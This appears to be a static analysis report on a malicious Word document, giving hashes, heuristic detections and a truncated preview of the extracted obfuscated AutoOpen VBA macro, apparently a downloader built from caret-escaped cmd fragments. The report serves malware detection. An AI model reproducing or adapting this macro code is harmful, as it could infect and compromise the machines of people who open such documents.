Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 94077646495213e6…

MALICIOUS

Office (OLE)

129.6 KB Created: 2018-10-02 10:52:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: b91941b4759dad3aa15cc867d5cde1dd SHA-1: 9951742300b73e00e45d7ac0febad71ab38af23e SHA-256: 94077646495213e6f53b6be41082d0130c10b23192dcd9896b00b01c37d2a610
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a legacy WordBasic AutoOpen macro. This macro is designed to execute obfuscated VBA code, which includes a Shell() call, indicating an attempt to run external commands or download additional payloads. The presence of the AutoOpen marker and the Shell() call strongly suggests a downloader or dropper functionality.

Heuristics 7

  • ClamAV: Doc.Malware.00536d-6704725-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6704725-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 92673 bytes
SHA-256: 95057c5036e9a7f19d6bbbfed0a3309a797fea052591c259c3797c9df008c79d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "HTcojPoTOPX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If KXsQqW Or zCfiw Then

Dim WmYBwV(3)
WmYBwV(0) = MmNMwi + 81550
WmYBwV(1) = 29721 + BYhczw + 71176 + 71291
WmYBwV(2) = 66500 + QGYju

End If
   If UwnoCQ >= WijVK Then

Dim JmJHHt(4)
JmJHHt(0) = 34352 + wPnnzp
JmJHHt(1) = jUnTFN + whHpHX
JmJHHt(2) = 37509 + AUsnm + tlHXw + WizADa
JmJHHt(3) = mOwCF + UpbzR + tRiPTu + Dlqif

End If
   If PSOiG = jzhBER Then

Dim PRXSmp(1)
PRXSmp(0) = ChnTfG + XmwfQH

End If
   If Cbtsf = 7 Then

Dim ukjLC(4)
ukjLC(0) = 13525 + lOYwqJ
ukjLC(1) = iiuCA + INkWoJ
ukjLC(2) = 81451 + 10622 + 28771 + YtKfIw
ukjLC(3) = 14211 + dzvmY + jazrb + jqslw

End If
   If lMdlmr Eqv 3 Then

Dim bNIlSC(2)
bNIlSC(0) = sWFnR + qabRvV + AiQpJP + miDQEi
bNIlSC(1) = JNsoQ + 98790 + cHcoOu + LlLqQz

End If
   If zSbCSi And ToimR Then

Dim MidiWM(4)
MidiWM(0) = WnBvU + asranj
MidiWM(1) = MQaMOj + OonFcd + wDiLu + JaJRji
MidiWM(2) = 41604 + VcOvF
MidiWM(3) = 77963 + wIQQp

End If
WVkbiRrjbQE (KeyString(BtSqncrm + jRMjC + 13 + 2 + 52 + HzUnZ + StFioGTt) + oVPKlEkL + EQskDGi + KeyString(aCbriX + JzRqmN + 15 + 2 + 60 + jBrWskbA + CAVihbj) + TWmifROXE + njqfYwziXL + YBwjC + tMLisfoCm + QuoUGnR + fTwXtZEw + rWFBpLMVtP + HJEIlMK + KmvwiATzX + AwSrqcp + tvUmGI)
   If mzTzW = CtczS Then

Dim ZziWZj(2)
ZziWZj(0) = vCXbiK + 26024
ZziWZj(1) = ktIBB + wtOqh

End If
   If LqsMZK Eqv omCuS Then

Dim EWzrJV(2)
EWzrJV(0) = 26800 + 82988 + fjTABJ + hpzjk
EWzrJV(1) = 58043 + 47556

End If
   If blvCD = uqTpZ Then

Dim uznSo(3)
uznSo(0) = 61077 + LtZIN
uznSo(1) = ENviK + ziWijS + 77570 + FmchMj
uznSo(2) = nrLRww + FcBdh

End If
   If MzIIOc < YPEAAD Then

Dim ZQswd(3)
ZQswd(0) = 38765 + VjQOc + dtjFkF + tnTYzG
ZQswd(1) = 27495 + cGRvu
ZQswd(2) = fLJjD + hqPrt + 74419 + IijwPu

End If
End Sub


Attribute VB_Name = "izmrbFTK"
Function TWmifROXE()
If iVBJdU Xor otOSTd Then

Dim TzjPBB(2)
TzjPBB(0) = 5828 + ZanAb
TzjPBB(1) = 78054 + dWNoQ

End If
   If jHJiR <= 11 Then

Dim sSMVd(2)
sSMVd(0) = UizOXp + afiilk + 34557 + 90075
sSMVd(1) = HFnmk + dbDOzW + mDjEv + 76263

End If
   If iflSj <> BZYuzO Then

Dim LGhqCt(3)
LGhqCt(0) = 9735 + KIsWJ
LGhqCt(1) = 88016 + whpicw + 47980 + CUBkbC
LGhqCt(2) = UwIqaz + NsuNz + Xtvaw + aqEUlc

End If
vwslC = "d /V^:^ON/C" + """" + "^s^" + "e^t ^S^O^Q=^mc^E^ I" + "^m/^ ^DZl^ N^W^~^ " + "^}^[a^ ^u^g^-^"
If ljcriz < HdziXH Then

Dim VbkdVv(1)
VbkdVv(0) = 51808 + ctqYP

End If
   If iMZbG Or jYJUJt Then

Dim JDzRI(4)
JDzRI(0) = AmDnBw + PGjBJ + nDzkFw + mpDbI
JDzRI(1) = 23696 + HMZwZ + WrSbZ + iqiZo
JDzRI(2) = 16171 + YFPKS + UGGKic + ptHDhn
JDzRI(3) = 52975 + OvlXKh

End If
PwiwWcimR = " c^{^=^ W^O^E^" + " ^b4^\ ^J^w^;" + "^ ^y^H(^ ^>Z^D^" + " ^J^>)^ ^b]^m^ }{^L^" + " Y^'\^ ^=R^H^ ^_^j^" + "h^}/^i^Z^}^["
If KmOFvA < 12 Then

Dim RRlVG(3)
RRlVG(0) = 83675 + 53021
RRlVG(1) = 12509 + XPjNN + BRYnmq + 48149
RRlVG(2) = UNtwjt + HXPzN + GTTzk + JURId

End If
   If QPSwn > sBGEEJ Then

Dim hjzvh(4)
hjzvh(0) = ifrAjR + JimHK
hjzvh(1) = 6838 + DuTJfB + PBajWj + OBYPzj
hjzvh(2) = 54564 + YPljc
hjzvh(3) = NPwtBN + nQqPf + SiRQKi + udOsK

End If
   If fVDXz And 18 Then

Dim JBmbq(2)
JBmbq(0) = 41300 + mbkiA + sJtHw + wQskAG
JBmbq(1) = dujRMS + GiRsp + oMZTsj + 85587

End If
fzBJOqCiI = "^?^x^{^F^,%^h^B^" + "[vc^A^S^_^" + "t^W^-^,^a^*^@^\c%^"
If whIOSs Or 18 Then

Dim RINsr(2)
RINsr(0) = GQsUP + ruwEq
RINsr(1) = XPXDF + hRHHa + 28608 + fVbpL

End If
Wtsoj = ">^i^}^s^dx^;Xrn^k^" + "4^l^d^a8^T^_^" + "e^-^i^Mr^W^_r^b^#" + "^G^y^;^3^J^DG^S" + "^P^p^w^H^qT^" + "W(^#^1^$)^U/^ ^"
If PXRccQ <> 1 Then

Dim RNofqd(2)
RNofqd(0) = 68766 + Zuzpp + 82198 + SYNrM
RNofqd(1) = Tshid + 84303

End If
   If Yzohus <> zclSUE Then

Dim pWRDk(2)
pWRDk(0) = FtPkEp + UHwMlw
pWRDk(1) 
... (truncated)